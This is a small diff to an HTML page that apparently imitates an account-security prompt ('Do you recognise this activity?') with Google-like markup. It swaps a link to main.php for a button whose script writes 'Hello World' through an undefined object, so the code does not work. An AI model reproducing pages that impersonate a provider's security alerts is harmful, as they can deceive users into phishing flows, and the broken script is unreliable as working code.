--- a/index.html
+++ b/index.html
@@ -28,9 +28,17 @@
 
 
     <div class="vzFH0" jsname="y9Vufe">Do you recognise this activity?</div><br>
+    
+    <button onclick="myFunction()">No, Secure Account</button>
 
-
-    <a class="btn btn-light mb-5" href="main.php">No, secure account</a>
+    <script>
+    function myFunction() {
+      pass.open();
+      pass.write("<h1>Hello World</h1>");
+      pass.close();
+    }
+    </script>
+    
     <a class="btn btn-light mb-5" href="yes.html" >Yes, it was me</a>
 
 
